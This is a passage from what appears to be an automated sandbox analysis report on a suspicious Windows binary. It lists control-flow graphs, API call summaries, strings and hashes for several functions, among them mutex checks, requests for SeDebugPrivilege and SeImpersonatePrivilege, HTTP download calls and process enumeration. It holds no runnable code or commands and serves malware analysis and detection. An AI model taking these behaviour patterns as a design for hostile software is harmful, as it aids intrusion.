                                                                                                                • Instruction Fuzzy Hash: B0624072A08BC585E7208F25D8903ED7771F7897A8F505325EAAD57AD9EF38D284C700

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2164 7ff6f1d99f80-7ff6f1d99fc5 2165 7ff6f1d9a291-7ff6f1d9a2cb call 7ff6f1da1e10 call 7ff6f1d9c600 2164->2165 2166 7ff6f1d99fcb-7ff6f1d99ff5 call 7ff6f1e11650 2164->2166 2174 7ff6f1d9a2d0-7ff6f1d9a2d6 2165->2174 2172 7ff6f1d9a004-7ff6f1d9a03d call 7ff6f1d9b5b0 call 7ff6f1da0c20 call 7ff6f1d9c600 2166->2172 2173 7ff6f1d99ff7-7ff6f1d9a000 2166->2173 2202 7ff6f1d9a043-7ff6f1d9a0c8 call 7ff6f1d986b0 call 7ff6f1d9b780 call 7ff6f1da1af0 call 7ff6f1d9bd00 2172->2202 2203 7ff6f1d9a1d4-7ff6f1d9a1db 2172->2203 2173->2172 2177 7ff6f1d9a467-7ff6f1d9a46b 2174->2177 2178 7ff6f1d9a2dc-7ff6f1d9a35b call 7ff6f1d986b0 call 7ff6f1d9b780 call 7ff6f1da1af0 call 7ff6f1d9bd00 2174->2178 2181 7ff6f1d9a471-7ff6f1d9a4ce call 7ff6f1d937f0 call 7ff6f1d93ff0 2177->2181 2182 7ff6f1d9a539-7ff6f1d9a540 2177->2182 2231 7ff6f1d9a361-7ff6f1d9a369 2178->2231 2232 7ff6f1d9a5ab-7ff6f1d9a5c7 call 7ff6f1d93e90 call 7ff6f1e00e88 2178->2232 2185 7ff6f1d9a50d-7ff6f1d9a538 call 7ff6f1dfe860 2181->2185 2211 7ff6f1d9a4d0-7ff6f1d9a4e5 2181->2211 2184 7ff6f1d9a542-7ff6f1d9a557 2182->2184 2182->2185 2189 7ff6f1d9a559-7ff6f1d9a56c 2184->2189 2190 7ff6f1d9a4fc-7ff6f1d9a508 call 7ff6f1dfe880 2184->2190 2195 7ff6f1d9a56e 2189->2195 2196 7ff6f1d9a576-7ff6f1d9a57b call 7ff6f1de8254 2189->2196 2190->2185 2195->2190 2219 7ff6f1d9a57c-7ff6f1d9a598 call 7ff6f1d93e90 call 7ff6f1e00e88 2196->2219 2202->2219 2260 7ff6f1d9a0ce-7ff6f1d9a0d6 2202->2260 2208 7ff6f1d9a225-7ff6f1d9a228 2203->2208 2209 7ff6f1d9a1dd-7ff6f1d9a223 call 7ff6f1d937f0 2203->2209 2215 7ff6f1d9a280-7ff6f1d9a28c call 7ff6f1d9b3d0 2208->2215 2216 7ff6f1d9a22a-7ff6f1d9a26b call 7ff6f1d937f0 2208->2216 2227 7ff6f1d9a270-7ff6f1d9a27f call 7ff6f1d93ff0 2209->2227 2211->2190 2218 7ff6f1d9a4e7-7ff6f1d9a4fa 2211->2218 2215->2185 2216->2227 2218->2190 2218->2196 2252 7ff6f1d9a599-7ff6f1d9a59e call 7ff6f1de8254 2219->2252 2227->2215 2238 7ff6f1d9a36b-7ff6f1d9a37c 2231->2238 2239 7ff6f1d9a39c-7ff6f1d9a3e1 call 7ff6f1e007d0 * 2 2231->2239 2247 7ff6f1d9a5c8-7ff6f1d9a5cd call 7ff6f1de8254 2232->2247 2240 7ff6f1d9a37e-7ff6f1d9a391 2238->2240 2241 7ff6f1d9a397 call 7ff6f1dfe880 2238->2241 2264 7ff6f1d9a3e3-7ff6f1d9a3f5 2239->2264 2265 7ff6f1d9a415-7ff6f1d9a428 2239->2265 2240->2241 2240->2247 2241->2239 2262 7ff6f1d9a5ce-7ff6f1d9a5e6 call 7ff6f1de8254 2247->2262 2263 7ff6f1d9a59f-7ff6f1d9a5a4 call 7ff6f1de8254 2252->2263 2266 7ff6f1d9a0d8-7ff6f1d9a0ea 2260->2266 2267 7ff6f1d9a10a-7ff6f1d9a150 call 7ff6f1e007d0 * 2 2260->2267 2285 7ff6f1d9a5f3 2262->2285 2286 7ff6f1d9a5e8-7ff6f1d9a5eb 2262->2286 2287 7ff6f1d9a5a5-7ff6f1d9a5aa call 7ff6f1de8254 2263->2287 2273 7ff6f1d9a410 call 7ff6f1dfe880 2264->2273 2274 7ff6f1d9a3f7-7ff6f1d9a40a 2264->2274 2275 7ff6f1d9a42a-7ff6f1d9a43c 2265->2275 2276 7ff6f1d9a45c-7ff6f1d9a462 2265->2276 2268 7ff6f1d9a105 call 7ff6f1dfe880 2266->2268 2269 7ff6f1d9a0ec-7ff6f1d9a0ff 2266->2269 2295 7ff6f1d9a183-7ff6f1d9a195 2267->2295 2296 7ff6f1d9a152-7ff6f1d9a163 2267->2296 2268->2267 2269->2252 2269->2268 2273->2265 2274->2262 2274->2273 2282 7ff6f1d9a43e-7ff6f1d9a451 2275->2282 2283 7ff6f1d9a457 call 7ff6f1dfe880 2275->2283 2276->2177 2282->2283 2289 7ff6f1d9a570-7ff6f1d9a575 call 7ff6f1de8254 2282->2289 2283->2276 2286->2285 2287->2232 2289->2196 2299 7ff6f1d9a197-7ff6f1d9a1a9 2295->2299 2300 7ff6f1d9a1c9-7ff6f1d9a1cf 2295->2300 2297 7ff6f1d9a17e call 7ff6f1dfe880 2296->2297 2298 7ff6f1d9a165-7ff6f1d9a178 2296->2298 2297->2295 2298->2263 2298->2297 2302 7ff6f1d9a1c4 call 7ff6f1dfe880 2299->2302 2303 7ff6f1d9a1ab-7ff6f1d9a1be 2299->2303 2300->2203 2302->2300 2303->2287 2303->2302
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                • String ID: value
                                                                                                                • API String ID: 1346393832-494360628
                                                                                                                • Opcode ID: 009ab91307f0b354080e9b7c0d63b7709cf52707709ce36b49185635711d943d
                                                                                                                • Instruction ID: 392f8fedc821d13a32326c2ef64092089c570f325e15a93456213e2e5721a905
                                                                                                                • Opcode Fuzzy Hash: 009ab91307f0b354080e9b7c0d63b7709cf52707709ce36b49185635711d943d
                                                                                                                • Instruction Fuzzy Hash: 44029063A18BC185EB40DB74D4A02AD7771EB857E4F505331FAAD92ADAEF6CE184C300

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2515 7ff6f1dcc600-7ff6f1dcc622 call 7ff6f1dcf820 2518 7ff6f1dcc624-7ff6f1dcc647 call 7ff6f1dcfb60 call 7ff6f1dda780 call 7ff6f1d92660 ExitProcess 2515->2518 2519 7ff6f1dcc64e-7ff6f1dcc700 call 7ff6f1ddb9b0 * 2 call 7ff6f1dd8030 call 7ff6f1dcd030 2515->2519 2534 7ff6f1dcc702-7ff6f1dcc714 2519->2534 2535 7ff6f1dcc734-7ff6f1dcc76b OpenMutexA 2519->2535 2538 7ff6f1dcc72f call 7ff6f1dfe880 2534->2538 2539 7ff6f1dcc716-7ff6f1dcc729 2534->2539 2536 7ff6f1dcc76d-7ff6f1dcc772 ExitProcess 2535->2536 2537 7ff6f1dcc779-7ff6f1dcc7b0 CreateMutexExA call 7ff6f1dc66f0 call 7ff6f1dcfca0 2535->2537 2550 7ff6f1dcc7b2-7ff6f1dcc7b7 ExitProcess 2537->2550 2551 7ff6f1dcc7be-7ff6f1dcc821 call 7ff6f1dd8330 call 7ff6f1d8d570 call 7ff6f1d8e610 call 7ff6f1d8ecb0 call 7ff6f1d8f9e0 call 7ff6f1d8ca10 call 7ff6f1dbcab0 call 7ff6f1dbf7a0 call 7ff6f1d81b90 call 7ff6f1d8add0 call 7ff6f1d89680 call 7ff6f1dcd260 call 7ff6f1d8bf40 call 7ff6f1d877d0 call 7ff6f1d84b70 call 7ff6f1d87aa0 call 7ff6f1dd4a30 2537->2551 2538->2535 2539->2538 2541 7ff6f1dcc8c6-7ff6f1dcc8cb call 7ff6f1de8254 2539->2541 2547 7ff6f1dcc8cc-7ff6f1dcc8d1 call 7ff6f1de8254 2541->2547 2588 7ff6f1dcc826-7ff6f1dcc836 call 7ff6f1dcbcc0 2551->2588 2592 7ff6f1dcc84a-7ff6f1dcc851 2588->2592 2593 7ff6f1dcc838-7ff6f1dcc844 ReleaseMutex CloseHandle 2588->2593 2594 7ff6f1dcc853-7ff6f1dcc858 call 7ff6f1dcc8e0 2592->2594 2595 7ff6f1dcc859-7ff6f1dcc865 2592->2595 2593->2592 2594->2595 2597 7ff6f1dcc895-7ff6f1dcc8c5 call 7ff6f1dfe860 2595->2597 2598 7ff6f1dcc867-7ff6f1dcc879 2595->2598 2600 7ff6f1dcc890 call 7ff6f1dfe880 2598->2600 2601 7ff6f1dcc87b-7ff6f1dcc88e 2598->2601 2600->2597 2601->2547 2601->2600
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ExitOpenToken$CloseCurrentFileHandleInformationInitializeModuleMutexName
                                                                                                                • String ID: SeDebugPrivilege$SeImpersonatePrivilege
                                                                                                                • API String ID: 3348294976-3768118664
                                                                                                                • Opcode ID: fdb5abae78c5590c4d6b8baa5b6d6c2b29b9181fb2dcc2fe967658aedaec6400
                                                                                                                • Instruction ID: da217f13cdd8afab3bc545cb1b4f8114106ff8c6f9712456318efd2270ec694f
                                                                                                                • Opcode Fuzzy Hash: fdb5abae78c5590c4d6b8baa5b6d6c2b29b9181fb2dcc2fe967658aedaec6400
                                                                                                                • Instruction Fuzzy Hash: CC619122E1CA8642EB10AB65A4513BA63B0FFC57D0F505735E6AEC26D6FF2CE0418B00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Query$AvailableDataHttpInfoOpen_invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskFileHandleRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352168858-0
                                                                                                                • Opcode ID: a57db0754635a1d44e2be10434760b23075835c2ad68753c080c0da192c3cdcc
                                                                                                                • Instruction ID: 437c048cbcacde3ce112a918208b9bffdcd65c7e48219d7952385e24a1883918
                                                                                                                • Opcode Fuzzy Hash: a57db0754635a1d44e2be10434760b23075835c2ad68753c080c0da192c3cdcc
                                                                                                                • Instruction Fuzzy Hash: AD024132A18B9586EB10CB65E84036E77B5FB957D4F104225EEAD97B98EF7CD180CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID: [PID:
                                                                                                                • API String ID: 1946380282-2210602247
                                                                                                                • Opcode ID: 4c24e0b3fb227cc9e4ffa0027738b4947391286fa535c02315df1d0c3b3d45e4
                                                                                                                • Instruction ID: 779534e0d2df9b4c8c841d31c1966ce80bc4f06ed1fc8c4100ebd923c28095f1
                                                                                                                • Opcode Fuzzy Hash: 4c24e0b3fb227cc9e4ffa0027738b4947391286fa535c02315df1d0c3b3d45e4
                                                                                                                • Instruction Fuzzy Hash: 34E1A272A18BC186EB209B25E8903AD77B5F7857E4F505325EAAD47BD9EF38D240C700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 38fb63e233e309ccbce14bd655863bfb560a24392900e53a5046892c4ac42b64
                                                                                                                • Instruction ID: 68833dec8532aec4ae97c6e1a280e2696306ec308de89faf653f12021f6181f4
                                                                                                                • Opcode Fuzzy Hash: 38fb63e233e309ccbce14bd655863bfb560a24392900e53a5046892c4ac42b64
                                                                                                                • Instruction Fuzzy Hash: F0724072A19BC589EB208B65E8403AD73B1F789798F505325EEEC57B99EF38D240C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerReadSize_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                • API String ID: 2478245620-15404121
                                                                                                                • Opcode ID: cdc9b60c854cdcbeaf71dfb81e76edab83bed13f15cecf9c3a3e5e36df3e413e
                                                                                                                • Instruction ID: 2747fcc6802f9d2a33a9c29b0271e1758060fb1c28f1a013b39848d1b9787fb3
                                                                                                                • Opcode Fuzzy Hash: cdc9b60c854cdcbeaf71dfb81e76edab83bed13f15cecf9c3a3e5e36df3e413e
                                                                                                                • Instruction Fuzzy Hash: 3D322532A18BC589EB24CF24D8803ED37B1FB85788F508626DA5D97B99EF78D645C700
                                                                                                                APIs
                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F1DF2E81
                                                                                                                  • Part of subcall function 00007FF6F1DF24E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F1DF24FC
                                                                                                                  • Part of subcall function 00007FF6F1DED3C8: RtlFreeHeap.NTDLL ref: 00007FF6F1DED3DE
                                                                                                                  • Part of subcall function 00007FF6F1DED3C8: GetLastError.KERNEL32 ref: 00007FF6F1DED3E8
                                                                                                                  • Part of subcall function 00007FF6F1DE8284: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6F1DE8233,?,?,?,?,-2723E8D8DEBC5093,00007FF6F1DE811E), ref: 00007FF6F1DE828D
                                                                                                                  • Part of subcall function 00007FF6F1DE8284: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6F1DE8233,?,?,?,?,-2723E8D8DEBC5093,00007FF6F1DE811E), ref: 00007FF6F1DE82B2
                                                                                                                  • Part of subcall function 00007FF6F1DFBA84: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F1DFB9CF
                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F1DF2E70
                                                                                                                  • Part of subcall function 00007FF6F1DF2548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F1DF255C
                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F1DF30E6
                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F1DF30F7
                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F1DF3108
                                                                                                                • GetTimeZoneInformation.KERNEL32(00007FF6F1DF33F8), ref: 00007FF6F1DF312F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                • Opcode ID: d27e707e32a7a668b79f18f39980f86f66c1361dc0c94ac41fd5faca01788e5a
                                                                                                                • Instruction ID: cb782396fbf8f2697957074ac5bea41c319d831a9391e5c2f821a19c4725d1fd
                                                                                                                • Opcode Fuzzy Hash: d27e707e32a7a668b79f18f39980f86f66c1361dc0c94ac41fd5faca01788e5a
                                                                                                                • Instruction Fuzzy Hash: DAD1B262A0825256EB209F25D8501B967B1FF84BD4F45423AEA3DCBAC6FF3CE541C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                • String ID:
                                                                                                                • API String ID: 1617910340-0
                                                                                                                • Opcode ID: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
                                                                                                                • Instruction ID: 0597954f1010cda99a9dc00cad829c0d1b0a0a2b5553c56b3276a0d06e48baaa
                                                                                                                • Opcode Fuzzy Hash: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
                                                                                                                • Instruction Fuzzy Hash: 1DC1AF36B28A4686EB10CFA9C4902AC3771EB49BE8B115325DE2FA77D4EF39D151C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                • Opcode ID: a0b2f147c5ed72e73a9ba99eccd64d774068bd057930b9dd808764ab5dc4e304
                                                                                                                • Instruction ID: 9154ba6d4fd7a7d64cbee1457428b8660315cabf37d18c97523636c778afa406
                                                                                                                • Opcode Fuzzy Hash: a0b2f147c5ed72e73a9ba99eccd64d774068bd057930b9dd808764ab5dc4e304
                                                                                                                • Instruction Fuzzy Hash: 68518232A1864296E710DF21E8815B967B0FB887D4F455239EA7EC7AD6EF3CE540C740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 1405656091-0
                                                                                                                • Opcode ID: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
                                                                                                                • Instruction ID: 1335aae3ea4d5e483952e9bb618ac06ff74ef36f970269920d24e63921077a22
                                                                                                                • Opcode Fuzzy Hash: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
                                                                                                                • Instruction Fuzzy Hash: 6281B1B2B052468BEB588F25C9513B863A5EB54BCDF449239DA1D8A7C9FF3CE6408740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: cores
                                                                                                                • API String ID: 3668304517-2370456839
                                                                                                                • Opcode ID: c015235d733b43bac9d39de2a43355ad681f02ecaa006eea8bb7fde0cf9742d1
                                                                                                                • Instruction ID: fd5dc4b6c396c587e9a2642b2afab29905cac6e43883959eb6f6a10a6857536f
                                                                                                                • Opcode Fuzzy Hash: c015235d733b43bac9d39de2a43355ad681f02ecaa006eea8bb7fde0cf9742d1
